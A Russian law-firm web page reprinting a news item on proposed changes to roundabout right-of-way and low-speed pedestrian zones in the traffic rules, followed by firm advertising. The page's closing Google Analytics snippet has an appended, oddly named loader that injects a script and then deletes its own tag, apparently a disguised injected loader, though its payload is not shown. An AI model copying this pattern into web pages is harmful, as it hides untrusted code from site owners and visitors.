Водителей вписывают в круг

Водителей вписывают в круг

В России могут измениться правила проезда перекрестков
В России скоро могут внести коррективы в Правила дорожного движения (ПДД), приближающие их к общеевропейским стандартам. Проработать изменения в законодательство, как стало известно «Ъ», поручил первый вице-премьер Игорь Шувалов.

Так, водители, двигающиеся по перекрестку с круговым движением, получат преимущество перед въезжающими на круг. Кроме того, в городах могут появиться так называемые зоны успокоенного движения, где пешеходы смогут переходить проезжую часть в любом месте, а машины должны ехать со скоростью 10−20 км/ч.
По итогам совещания в правительстве по вопросам безопасности дорожного движения первый вице-премьер Игорь Шувалов дал поручения МВД и Минтрансу в течение месяца проработать предложения, связанные с изменением ПДД, рассказал «Ъ» представитель господина Шувалова.

Первое из них касается правил проезда автомобилей перекрестков с круговым движением. Сегодня, согласно ПДД, водители машин на круге уступают дорогу тем, кто на него въезжает — действует принцип помехи справа. Если перед кругом установлен знак «Уступи дорогу», уступают соответственно въезжающие на перекресток (таким образом, организовано большинство круговых перекрестков в Москве).
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');